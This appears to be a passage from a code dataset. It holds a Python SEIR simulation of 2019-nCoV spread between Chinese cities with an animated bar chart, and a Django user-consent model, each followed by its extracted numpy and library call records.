'import numpy as np\n'), ((18152, 18182), 'numpy.exp', 'np.exp', (['(2.0 / 3 * np.pi * 1.0j)'], {}), '(2.0 / 3 * 
np.pi * 1.0j)\n', (18158, 18182), True, 'import numpy as np\n'), ((23924, 23940), 'numpy.sqrt', 'np.sqrt', (['s_total'], {}), '(s_total)\n', (23931, 23940), True, 'import numpy as np\n'), ((35685, 35706), 'numpy.deg2rad', 'np.deg2rad', (['phases[0]'], {}), '(phases[0])\n', (35695, 35706), True, 'import numpy as np\n'), ((35744, 35765), 'numpy.deg2rad', 'np.deg2rad', (['phases[1]'], {}), '(phases[1])\n', (35754, 35765), True, 'import numpy as np\n'), ((35803, 35824), 'numpy.deg2rad', 'np.deg2rad', (['phases[2]'], {}), '(phases[2])\n', (35813, 35824), True, 'import numpy as np\n'), ((35872, 35890), 'numpy.deg2rad', 'np.deg2rad', (['phases'], {}), '(phases)\n', (35882, 35890), True, 'import numpy as np\n'), ((35928, 35952), 'numpy.deg2rad', 'np.deg2rad', (['(phases - 240)'], {}), '(phases - 240)\n', (35938, 35952), True, 'import numpy as np\n'), ((35988, 36012), 'numpy.deg2rad', 'np.deg2rad', (['(phases - 120)'], {}), '(phases - 120)\n', (35998, 36012), True, 'import numpy as np\n'), ((36895, 36905), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (36902, 36905), True, 'import numpy as np\n'), ((36906, 36934), 'numpy.exp', 'np.exp', (['(1.0j * omega * Times)'], {}), '(1.0j * omega * Times)\n', (36912, 36934), True, 'import numpy as np\n'), ((37370, 37380), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (37377, 37380), True, 'import numpy as np\n'), ((37381, 37409), 'numpy.exp', 'np.exp', (['(1.0j * omega * Times)'], {}), '(1.0j * omega * Times)\n', (37387, 37409), True, 'import numpy as np\n'), ((6399, 6411), 'numpy.abs', 'np.abs', (['v_ag'], {}), '(v_ag)\n', (6405, 6411), True, 'import numpy as np\n'), ((6448, 6460), 'numpy.abs', 'np.abs', (['v_bg'], {}), '(v_bg)\n', (6454, 6460), True, 'import numpy as np\n'), ((6497, 6509), 'numpy.abs', 'np.abs', (['v_cg'], {}), '(v_cg)\n', (6503, 6509), True, 'import numpy as np\n'), ((6589, 6613), 'numpy.angle', 'np.angle', (['v_ag'], {'deg': '(True)'}), '(v_ag, deg=True)\n', (6597, 6613), True, 'import numpy as np\n'), ((6652, 6676), 'numpy.angle', 'np.angle', (['v_bg'], {'deg': '(True)'}), '(v_bg, deg=True)\n', (6660, 6676), True, 'import numpy as np\n'), ((6715, 6739), 'numpy.angle', 'np.angle', (['v_cg'], {'deg': '(True)'}), '(v_cg, deg=True)\n', (6723, 6739), True, 'import numpy as np\n'), ((6778, 6799), 'numpy.angle', 'np.angle', (['(0)'], {'deg': '(True)'}), '(0, deg=True)\n', (6786, 6799), True, 'import numpy as np\n'), ((6837, 6856), 'numpy.abs', 'np.abs', (['(v_ag - v_bg)'], {}), '(v_ag - v_bg)\n', (6843, 6856), True, 'import numpy as np\n'), ((6891, 6910), 'numpy.abs', 'np.abs', (['(v_bg - v_cg)'], {}), '(v_bg - v_cg)\n', (6897, 6910), True, 'import numpy as np\n'), ((6945, 6964), 'numpy.abs', 'np.abs', (['(v_cg - v_ag)'], {}), '(v_cg - v_ag)\n', (6951, 6964), True, 'import numpy as np\n'), ((8133, 8145), 'numpy.abs', 'np.abs', (['v_an'], {}), '(v_an)\n', (8139, 8145), True, 'import numpy as np\n'), ((8182, 8194), 'numpy.abs', 'np.abs', (['v_bn'], {}), '(v_bn)\n', (8188, 8194), True, 'import numpy as np\n'), ((8231, 8243), 'numpy.abs', 'np.abs', (['v_cn'], {}), '(v_cn)\n', (8237, 8243), True, 'import numpy as np\n'), ((8280, 8292), 'numpy.abs', 'np.abs', (['v_ng'], {}), '(v_ng)\n', (8286, 8292), True, 'import numpy as np\n'), ((8332, 8363), 'numpy.angle', 'np.angle', (['(v_ag - v_ng)'], {'deg': '(True)'}), '(v_ag - v_ng, deg=True)\n', (8340, 8363), True, 'import numpy as np\n'), ((8400, 8431), 'numpy.angle', 'np.angle', (['(v_bg - v_ng)'], {'deg': '(True)'}), '(v_bg - v_ng, deg=True)\n', (8408, 8431), True, 'import numpy as np\n'), ((8468, 
8499), 'numpy.angle', 'np.angle', (['(v_cg - v_ng)'], {'deg': '(True)'}), '(v_cg - v_ng, deg=True)\n', (8476, 8499), True, 'import numpy as np\n'), ((8536, 8560), 'numpy.angle', 'np.angle', (['v_ng'], {'deg': '(True)'}), '(v_ng, deg=True)\n', (8544, 8560), True, 'import numpy as np\n'), ((8598, 8617), 'numpy.abs', 'np.abs', (['(v_ag - v_bg)'], {}), '(v_ag - v_bg)\n', (8604, 8617), True, 'import numpy as np\n'), ((8652, 8671), 'numpy.abs', 'np.abs', (['(v_bg - v_cg)'], {}), '(v_bg - v_cg)\n', (8658, 8671), True, 'import numpy as np\n'), ((8706, 8725), 'numpy.abs', 'np.abs', (['(v_cg - v_ag)'], {}), '(v_cg - v_ag)\n', (8712, 8725), True, 'import numpy as np\n'), ((21722, 21743), 'numpy.abs', 'np.abs', (['(v_abc - v_avg)'], {}), '(v_abc - v_avg)\n', (21728, 21743), True, 'import numpy as np\n'), ((39005, 39018), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (39011, 39018), True, 'import numpy as np\n'), ((39020, 39053), 'numpy.cos', 'np.cos', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (39026, 39053), True, 'import numpy as np\n'), ((39049, 39082), 'numpy.cos', 'np.cos', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (39055, 39082), True, 'import numpy as np\n'), ((39391, 39404), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (39397, 39404), True, 'import numpy as np\n'), ((39406, 39439), 'numpy.cos', 'np.cos', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (39412, 39439), True, 'import numpy as np\n'), ((39435, 39468), 'numpy.cos', 'np.cos', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (39441, 39468), True, 'import numpy as np\n'), ((40550, 40563), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (40556, 40563), True, 'import numpy as np\n'), ((40565, 40598), 'numpy.cos', 'np.cos', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (40571, 40598), True, 'import numpy as np\n'), ((40594, 40627), 'numpy.cos', 'np.cos', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (40600, 40627), True, 'import numpy as np\n'), ((12457, 12468), 'numpy.abs', 'np.abs', (['I_a'], {}), '(I_a)\n', (12463, 12468), True, 'import numpy as np\n'), ((12514, 12525), 'numpy.abs', 'np.abs', (['I_b'], {}), '(I_b)\n', (12520, 12525), True, 'import numpy as np\n'), ((12571, 12582), 'numpy.abs', 'np.abs', (['I_c'], {}), '(I_c)\n', (12577, 12582), True, 'import numpy as np\n'), ((12628, 12639), 'numpy.abs', 'np.abs', (['I_n'], {}), '(I_n)\n', (12634, 12639), True, 'import numpy as np\n'), ((12685, 12708), 'numpy.angle', 'np.angle', (['I_a'], {'deg': '(True)'}), '(I_a, deg=True)\n', (12693, 12708), True, 'import numpy as np\n'), ((12754, 12777), 'numpy.angle', 'np.angle', (['I_b'], {'deg': '(True)'}), '(I_b, deg=True)\n', (12762, 12777), True, 'import numpy as np\n'), ((12823, 12846), 'numpy.angle', 'np.angle', (['I_c'], {'deg': '(True)'}), '(I_c, deg=True)\n', (12831, 12846), True, 'import numpy as np\n'), ((12892, 12915), 'numpy.angle', 'np.angle', (['I_n'], {'deg': '(True)'}), '(I_n, deg=True)\n', (12900, 12915), True, 'import numpy as np\n'), ((12961, 12972), 'numpy.abs', 'np.abs', (['I_a'], {}), '(I_a)\n', (12967, 12972), True, 'import numpy as np\n'), ((13018, 13029), 'numpy.abs', 'np.abs', (['I_b'], {}), '(I_b)\n', (13024, 13029), True, 'import numpy as np\n'), ((13075, 13086), 'numpy.abs', 'np.abs', (['I_c'], {}), '(I_c)\n', (13081, 13086), True, 'import numpy as np\n'), ((13132, 13143), 'numpy.abs', 'np.abs', (['I_n'], {}), '(I_n)\n', (13138, 13143), 
True, 'import numpy as np\n'), ((13189, 13212), 'numpy.angle', 'np.angle', (['I_a'], {'deg': '(True)'}), '(I_a, deg=True)\n', (13197, 13212), True, 'import numpy as np\n'), ((13258, 13281), 'numpy.angle', 'np.angle', (['I_b'], {'deg': '(True)'}), '(I_b, deg=True)\n', (13266, 13281), True, 'import numpy as np\n'), ((13327, 13350), 'numpy.angle', 'np.angle', (['I_c'], {'deg': '(True)'}), '(I_c, deg=True)\n', (13335, 13350), True, 'import numpy as np\n'), ((13396, 13419), 'numpy.angle', 'np.angle', (['I_n'], {'deg': '(True)'}), '(I_n, deg=True)\n', (13404, 13419), True, 'import numpy as np\n'), ((13461, 13472), 'numpy.abs', 'np.abs', (['i_z'], {}), '(i_z)\n', (13467, 13472), True, 'import numpy as np\n'), ((13514, 13525), 'numpy.abs', 'np.abs', (['i_p'], {}), '(i_p)\n', (13520, 13525), True, 'import numpy as np\n'), ((13567, 13578), 'numpy.abs', 'np.abs', (['i_n'], {}), '(i_n)\n', (13573, 13578), True, 'import numpy as np\n'), ((13935, 13946), 'numpy.abs', 'np.abs', (['I_a'], {}), '(I_a)\n', (13941, 13946), True, 'import numpy as np\n'), ((13992, 14003), 'numpy.abs', 'np.abs', (['I_b'], {}), '(I_b)\n', (13998, 14003), True, 'import numpy as np\n'), ((14049, 14060), 'numpy.abs', 'np.abs', (['I_c'], {}), '(I_c)\n', (14055, 14060), True, 'import numpy as np\n'), ((14106, 14117), 'numpy.abs', 'np.abs', (['I_n'], {}), '(I_n)\n', (14112, 14117), True, 'import numpy as np\n'), ((14163, 14186), 'numpy.angle', 'np.angle', (['I_a'], {'deg': '(True)'}), '(I_a, deg=True)\n', (14171, 14186), True, 'import numpy as np\n'), ((14232, 14255), 'numpy.angle', 'np.angle', (['I_b'], {'deg': '(True)'}), '(I_b, deg=True)\n', (14240, 14255), True, 'import numpy as np\n'), ((14301, 14324), 'numpy.angle', 'np.angle', (['I_c'], {'deg': '(True)'}), '(I_c, deg=True)\n', (14309, 14324), True, 'import numpy as np\n'), ((14370, 14393), 'numpy.angle', 'np.angle', (['I_n'], {'deg': '(True)'}), '(I_n, deg=True)\n', (14378, 14393), True, 'import numpy as np\n'), ((14439, 14450), 'numpy.abs', 'np.abs', (['I_a'], {}), '(I_a)\n', (14445, 14450), True, 'import numpy as np\n'), ((14496, 14507), 'numpy.abs', 'np.abs', (['I_b'], {}), '(I_b)\n', (14502, 14507), True, 'import numpy as np\n'), ((14553, 14564), 'numpy.abs', 'np.abs', (['I_c'], {}), '(I_c)\n', (14559, 14564), True, 'import numpy as np\n'), ((14610, 14621), 'numpy.abs', 'np.abs', (['I_n'], {}), '(I_n)\n', (14616, 14621), True, 'import numpy as np\n'), ((14667, 14690), 'numpy.angle', 'np.angle', (['I_a'], {'deg': '(True)'}), '(I_a, deg=True)\n', (14675, 14690), True, 'import numpy as np\n'), ((14736, 14759), 'numpy.angle', 'np.angle', (['I_b'], {'deg': '(True)'}), '(I_b, deg=True)\n', (14744, 14759), True, 'import numpy as np\n'), ((14805, 14828), 'numpy.angle', 'np.angle', (['I_c'], {'deg': '(True)'}), '(I_c, deg=True)\n', (14813, 14828), True, 'import numpy as np\n'), ((14874, 14897), 'numpy.angle', 'np.angle', (['I_n'], {'deg': '(True)'}), '(I_n, deg=True)\n', (14882, 14897), True, 'import numpy as np\n'), ((16115, 16128), 'numpy.abs', 'np.abs', (['I_j_a'], {}), '(I_j_a)\n', (16121, 16128), True, 'import numpy as np\n'), ((16174, 16187), 'numpy.abs', 'np.abs', (['I_j_b'], {}), '(I_j_b)\n', (16180, 16187), True, 'import numpy as np\n'), ((16233, 16246), 'numpy.abs', 'np.abs', (['I_j_c'], {}), '(I_j_c)\n', (16239, 16246), True, 'import numpy as np\n'), ((16292, 16305), 'numpy.abs', 'np.abs', (['I_j_n'], {}), '(I_j_n)\n', (16298, 16305), True, 'import numpy as np\n'), ((16351, 16376), 'numpy.angle', 'np.angle', (['I_j_a'], {'deg': '(True)'}), '(I_j_a, deg=True)\n', (16359, 
16376), True, 'import numpy as np\n'), ((16422, 16447), 'numpy.angle', 'np.angle', (['I_j_b'], {'deg': '(True)'}), '(I_j_b, deg=True)\n', (16430, 16447), True, 'import numpy as np\n'), ((16493, 16518), 'numpy.angle', 'np.angle', (['I_j_c'], {'deg': '(True)'}), '(I_j_c, deg=True)\n', (16501, 16518), True, 'import numpy as np\n'), ((16564, 16589), 'numpy.angle', 'np.angle', (['I_j_n'], {'deg': '(True)'}), '(I_j_n, deg=True)\n', (16572, 16589), True, 'import numpy as np\n'), ((16635, 16648), 'numpy.abs', 'np.abs', (['I_k_a'], {}), '(I_k_a)\n', (16641, 16648), True, 'import numpy as np\n'), ((16694, 16707), 'numpy.abs', 'np.abs', (['I_k_b'], {}), '(I_k_b)\n', (16700, 16707), True, 'import numpy as np\n'), ((16753, 16766), 'numpy.abs', 'np.abs', (['I_k_c'], {}), '(I_k_c)\n', (16759, 16766), True, 'import numpy as np\n'), ((16812, 16825), 'numpy.abs', 'np.abs', (['I_k_n'], {}), '(I_k_n)\n', (16818, 16825), True, 'import numpy as np\n'), ((16871, 16896), 'numpy.angle', 'np.angle', (['I_k_a'], {'deg': '(True)'}), '(I_k_a, deg=True)\n', (16879, 16896), True, 'import numpy as np\n'), ((16942, 16967), 'numpy.angle', 'np.angle', (['I_k_b'], {'deg': '(True)'}), '(I_k_b, deg=True)\n', (16950, 16967), True, 'import numpy as np\n'), ((17013, 17038), 'numpy.angle', 'np.angle', (['I_k_c'], {'deg': '(True)'}), '(I_k_c, deg=True)\n', (17021, 17038), True, 'import numpy as np\n'), ((17084, 17109), 'numpy.angle', 'np.angle', (['I_k_n'], {'deg': '(True)'}), '(I_k_n, deg=True)\n', (17092, 17109), True, 'import numpy as np\n'), ((17151, 17162), 'numpy.abs', 'np.abs', (['i_z'], {}), '(i_z)\n', (17157, 17162), True, 'import numpy as np\n'), ((17204, 17215), 'numpy.abs', 'np.abs', (['i_p'], {}), '(i_p)\n', (17210, 17215), True, 'import numpy as np\n'), ((17257, 17268), 'numpy.abs', 'np.abs', (['i_n'], {}), '(i_n)\n', (17263, 17268), True, 'import numpy as np\n'), ((18484, 18497), 'numpy.abs', 'np.abs', (['I_j_a'], {}), '(I_j_a)\n', (18490, 18497), True, 'import numpy as np\n'), ((18543, 18556), 'numpy.abs', 'np.abs', (['I_j_b'], {}), '(I_j_b)\n', (18549, 18556), True, 'import numpy as np\n'), ((18602, 18615), 'numpy.abs', 'np.abs', (['I_j_c'], {}), '(I_j_c)\n', (18608, 18615), True, 'import numpy as np\n'), ((18661, 18674), 'numpy.abs', 'np.abs', (['I_j_n'], {}), '(I_j_n)\n', (18667, 18674), True, 'import numpy as np\n'), ((18720, 18745), 'numpy.angle', 'np.angle', (['I_j_a'], {'deg': '(True)'}), '(I_j_a, deg=True)\n', (18728, 18745), True, 'import numpy as np\n'), ((18791, 18816), 'numpy.angle', 'np.angle', (['I_j_b'], {'deg': '(True)'}), '(I_j_b, deg=True)\n', (18799, 18816), True, 'import numpy as np\n'), ((18862, 18887), 'numpy.angle', 'np.angle', (['I_j_c'], {'deg': '(True)'}), '(I_j_c, deg=True)\n', (18870, 18887), True, 'import numpy as np\n'), ((18933, 18958), 'numpy.angle', 'np.angle', (['I_j_n'], {'deg': '(True)'}), '(I_j_n, deg=True)\n', (18941, 18958), True, 'import numpy as np\n'), ((19004, 19017), 'numpy.abs', 'np.abs', (['I_k_a'], {}), '(I_k_a)\n', (19010, 19017), True, 'import numpy as np\n'), ((19063, 19076), 'numpy.abs', 'np.abs', (['I_k_b'], {}), '(I_k_b)\n', (19069, 19076), True, 'import numpy as np\n'), ((19122, 19135), 'numpy.abs', 'np.abs', (['I_k_c'], {}), '(I_k_c)\n', (19128, 19135), True, 'import numpy as np\n'), ((19181, 19194), 'numpy.abs', 'np.abs', (['I_k_n'], {}), '(I_k_n)\n', (19187, 19194), True, 'import numpy as np\n'), ((19240, 19265), 'numpy.angle', 'np.angle', (['I_k_a'], {'deg': '(True)'}), '(I_k_a, deg=True)\n', (19248, 19265), True, 'import numpy as np\n'), ((19311, 19336), 
'numpy.angle', 'np.angle', (['I_k_b'], {'deg': '(True)'}), '(I_k_b, deg=True)\n', (19319, 19336), True, 'import numpy as np\n'), ((19382, 19407), 'numpy.angle', 'np.angle', (['I_k_c'], {'deg': '(True)'}), '(I_k_c, deg=True)\n', (19390, 19407), True, 'import numpy as np\n'), ((19453, 19478), 'numpy.angle', 'np.angle', (['I_k_n'], {'deg': '(True)'}), '(I_k_n, deg=True)\n', (19461, 19478), True, 'import numpy as np\n'), ((39113, 39126), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (39119, 39126), True, 'import numpy as np\n'), ((39128, 39161), 'numpy.sin', 'np.sin', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (39134, 39161), True, 'import numpy as np\n'), ((39157, 39190), 'numpy.sin', 'np.sin', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (39163, 39190), True, 'import numpy as np\n'), ((39499, 39512), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (39505, 39512), True, 'import numpy as np\n'), ((39514, 39547), 'numpy.sin', 'np.sin', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (39520, 39547), True, 'import numpy as np\n'), ((39543, 39576), 'numpy.sin', 'np.sin', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (39549, 39576), True, 'import numpy as np\n'), ((40658, 40671), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (40664, 40671), True, 'import numpy as np\n'), ((40673, 40706), 'numpy.sin', 'np.sin', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (40679, 40706), True, 'import numpy as np\n'), ((40702, 40735), 'numpy.sin', 'np.sin', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (40708, 40735), True, 'import numpy as np\n')] |
from matplotlib import animation
from simulate.citySEIR import dCitySEIR
from simulate.migration import Lout,Lin,dSpread
import pickle
import json
import numpy as np
import matplotlib.pyplot as plt
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['PingFang SC'] # set the default font
mpl.rcParams['axes.unicode_minus'] = False # keep the minus sign '-' from rendering as a box in saved figures
def simulate(initSEIR,days,hparams):
"""
    Simulate the spread of 2019-nCoV between 46 major cities.
    :param initSEIR: initial [S, E, I1, I2, R] vector of the seed city (Wuhan)
    :param days: number of days to simulate
    :param hparams: tuple (R0, Di, De, Da) of epidemic parameters
    :return: citysSEIR, ndarray of shape (numCities, 5, days)
"""
## params
    T = days # number of days to simulate
R0,Di,De,Da = hparams
## init
with open("../data/cases.pickle",'rb') as f:
cases = pickle.load(f)
with open("../data/cityPopulation.json",encoding='utf-8') as f:
population = json.load(f)
numCities = len(population)
citysSEIR = np.zeros((numCities,5,T))
for i,S in enumerate(population):
citysSEIR[i,0,0] = population[S]*10000
citysSEIR[0,:,0] = initSEIR
LSin,DLSin = np.array([Lin(i,0) for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float)
LEin,DLEin = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float)
LI1in,DLI1in = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float)
LI2in,DLI2in = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float)
LRin,DLRin = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float)
for t in range(T-1):
for i in range(numCities):
            Lo = Lout(i,t) # number of people leaving city i on day t
Lsi,Lei,Li1i,Li2i,Lri= LSin[i],LEin[i],LI1in[i],LI2in[i],LRin[i]
params = R0,Di,De,Da,Lsi,Lei,Li1i,Li2i,Lri,np.sum(Lo)
initVector = citysSEIR[i,:,t]
dF = dCitySEIR(initVector,t,params=(params))
citysSEIR[i,:,t+1] = citysSEIR[i,:,t] + dF
DLSin += dSpread(Lo,initVector,i)[0]
DLEin += dSpread(Lo,initVector,i)[1]
DLI1in+= dSpread(Lo,initVector,i)[2]
DLI2in+= dSpread(Lo,initVector,i)[3]
DLRin += dSpread(Lo,initVector,i)[4]
LSin,LEin,LI1in,LI2in,LRin = DLSin,DLEin,DLI1in,DLI2in,DLRin
DLSin = np.zeros_like(DLSin)
DLEin = np.zeros_like(DLEin)
DLI1in = np.zeros_like(DLI1in)
DLI2in = np.zeros_like(DLI2in)
DLRin = np.zeros_like(DLRin)
# print(t)
return citysSEIR
def visualize(citysSEIR):
with open("../data/cityAndId.json",encoding='utf-8') as f:
citys = json.load(f)
citys = [i for i in citys]
y_pos = np.arange(len(citys))
numcities,_,T = citysSEIR.shape
fig, ax = plt.subplots(2,2,figsize=(30,20))
for i in range(2):
for j in range(2):
ax[i,j].set_yticks(y_pos)
ax[i,j].set_yticklabels(citys)
x = range(numcities)
# S = ax[0, 0].barh(x, citysSEIR[:,0,T-1])
E = ax[0,0].barh(x,citysSEIR[:,1,T-1])
I1 = ax[0, 1].barh(x,citysSEIR[:,2,T-1])
I2 = ax[1, 0].barh(x,citysSEIR[:,3,T-1])
R = ax[1, 1].barh(x,citysSEIR[:,4,T-1])
# N = ax[1, 2].barh(x,np.sum(citysSEIR[:,:,T-1],axis=1))
SEIR = [E,I1,I2,R]
def animate(i):
# tex1 = ax[0, 0].set_title("S day{}".format(str(i + 1)))
tex2 = ax[0, 0].set_title("E day{}".format(str(i + 1)))
tex3 = ax[0, 1].set_title("I1 day{}".format(str(i + 1)))
tex4 = ax[1, 0].set_title("I2 day{}".format(str(i + 1)))
tex5 = ax[1, 1].set_title("R day{}".format(str(i + 1)))
# tex6 = ax[1, 2].set_title("N day{}".format(str(i + 1)))
for j,bar in enumerate(SEIR):
if j ==5:
y = np.sum(citysSEIR[:,:,i],axis=1)
else:
y = citysSEIR[:,j+1,i]
for t, b in enumerate(bar):
b.set_width(y[t])
anim = animation.FuncAnimation(fig, animate, repeat=True, blit=False, frames=T-1,
interval=200)
anim.save('mymovie.gif', writer='pillow')
plt.show()
if __name__ == "__main__":
R0 = 2.2
Di = 5
De = 12
Da = 3
T = 30
    initSEIR = [1108.1*10000,10,100,1,0] # S,E,I1,I2,R for Wuhan
citysSEIR = simulate(initSEIR,days=T,hparams=(R0,Di,De,Da))
visualize(citysSEIR)
| [
"matplotlib.animation.FuncAnimation",
"pickle.load",
"simulate.migration.Lout",
"numpy.sum",
"numpy.zeros",
"simulate.migration.Lin",
"simulate.citySEIR.dCitySEIR",
"json.load",
"simulate.migration.dSpread",
"numpy.zeros_like",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
] | [((810, 837), 'numpy.zeros', 'np.zeros', (['(numCities, 5, T)'], {}), '((numCities, 5, T))\n', (818, 837), True, 'import numpy as np\n'), ((2787, 2823), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '(30, 20)'}), '(2, 2, figsize=(30, 20))\n', (2799, 2823), True, 'import matplotlib.pyplot as plt\n'), ((3979, 4073), 'matplotlib.animation.FuncAnimation', 'animation.FuncAnimation', (['fig', 'animate'], {'repeat': '(True)', 'blit': '(False)', 'frames': '(T - 1)', 'interval': '(200)'}), '(fig, animate, repeat=True, blit=False, frames=T - 1,\n interval=200)\n', (4002, 4073), False, 'from matplotlib import animation\n'), ((4156, 4166), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4164, 4166), True, 'import matplotlib.pyplot as plt\n'), ((639, 653), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (650, 653), False, 'import pickle\n'), ((745, 757), 'json.load', 'json.load', (['f'], {}), '(f)\n', (754, 757), False, 'import json\n'), ((2326, 2346), 'numpy.zeros_like', 'np.zeros_like', (['DLSin'], {}), '(DLSin)\n', (2339, 2346), True, 'import numpy as np\n'), ((2364, 2384), 'numpy.zeros_like', 'np.zeros_like', (['DLEin'], {}), '(DLEin)\n', (2377, 2384), True, 'import numpy as np\n'), ((2403, 2424), 'numpy.zeros_like', 'np.zeros_like', (['DLI1in'], {}), '(DLI1in)\n', (2416, 2424), True, 'import numpy as np\n'), ((2443, 2464), 'numpy.zeros_like', 'np.zeros_like', (['DLI2in'], {}), '(DLI2in)\n', (2456, 2464), True, 'import numpy as np\n'), ((2482, 2502), 'numpy.zeros_like', 'np.zeros_like', (['DLRin'], {}), '(DLRin)\n', (2495, 2502), True, 'import numpy as np\n'), ((2655, 2667), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2664, 2667), False, 'import json\n'), ((1663, 1673), 'simulate.migration.Lout', 'Lout', (['i', 't'], {}), '(i, t)\n', (1667, 1673), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((1893, 1932), 'simulate.citySEIR.dCitySEIR', 'dCitySEIR', (['initVector', 't'], {'params': 'params'}), '(initVector, t, params=params)\n', (1902, 1932), False, 'from simulate.citySEIR import dCitySEIR\n'), ((986, 995), 'simulate.migration.Lin', 'Lin', (['i', '(0)'], {}), '(i, 0)\n', (989, 995), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((1821, 1831), 'numpy.sum', 'np.sum', (['Lo'], {}), '(Lo)\n', (1827, 1831), True, 'import numpy as np\n'), ((2011, 2037), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2018, 2037), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2061, 2087), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2068, 2087), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2111, 2137), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2118, 2137), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2161, 2187), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2168, 2187), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2211, 2237), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2218, 2237), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((3798, 3832), 'numpy.sum', 'np.sum', (['citysSEIR[:, :, i]'], {'axis': '(1)'}), '(citysSEIR[:, :, i], axis=1)\n', (3804, 3832), True, 'import numpy as np\n')] |
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from .app import App
class UserConsent(models.Model):
class Meta:
verbose_name = _("user consent")
verbose_name_plural = _("user consents")
unique_together = ('user', 'app')
user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("user"))
app = models.ForeignKey(App, verbose_name=_("app"))
_scope = models.TextField(default='', verbose_name=_("scopes"))
date_given = models.DateTimeField(verbose_name=_("date given"), auto_now_add=True)
date_updated = models.DateTimeField(verbose_name=_("date updated"), auto_now=True)
@property
def scope(self):
return set(self._scope.split())
@scope.setter
def scope(self, value):
self._scope = ' '.join(value)
def __str__(self):
return '{0} - {1}'.format(self.app, self.user)
| [
"django.utils.translation.ugettext_lazy"
] | [((205, 222), 'django.utils.translation.ugettext_lazy', '_', (['"""user consent"""'], {}), "('user consent')\n", (206, 222), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((247, 265), 'django.utils.translation.ugettext_lazy', '_', (['"""user consents"""'], {}), "('user consents')\n", (248, 265), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((368, 377), 'django.utils.translation.ugettext_lazy', '_', (['"""user"""'], {}), "('user')\n", (369, 377), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((422, 430), 'django.utils.translation.ugettext_lazy', '_', (['"""app"""'], {}), "('app')\n", (423, 430), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((484, 495), 'django.utils.translation.ugettext_lazy', '_', (['"""scopes"""'], {}), "('scopes')\n", (485, 495), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((546, 561), 'django.utils.translation.ugettext_lazy', '_', (['"""date given"""'], {}), "('date given')\n", (547, 561), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((632, 649), 'django.utils.translation.ugettext_lazy', '_', (['"""date updated"""'], {}), "('date updated')\n", (633, 649), True, 'from django.utils.translation import ugettext_lazy as _\n')] |